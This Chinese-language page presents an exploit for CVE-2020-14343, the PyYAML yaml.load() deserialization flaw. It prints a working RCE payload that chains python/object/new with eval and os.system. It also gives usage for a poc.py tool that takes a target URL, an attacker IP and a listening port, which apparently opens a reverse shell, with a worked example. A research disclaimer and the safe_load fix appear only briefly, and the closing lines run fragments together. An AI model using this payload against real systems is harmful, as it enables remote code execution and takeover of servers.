
CVE-2020-14343的payload
| 项目 | 信息 |
|---|---|
| CVE编号 | CVE-2020-14343 |
| 影响组件 | PyYAML < 5.4 |
| 漏洞类型 | 反序列化远程代码执行 (RCE) |
| 危害等级 | 高危 |
PyYAML 在使用 yaml.load() 解析不可信数据时,未限制危险的 YAML 标签(如 !!python/object),攻击者可构造恶意 YAML 内容执行任意 Python 代码。
Payload 核心:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
示例:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload 接口/login 接口加载并解析 YAMLpip install requests
⚠️ 本工具仅供安全研究和授权测试使用!
yaml.safe_load() 替代 yaml.load()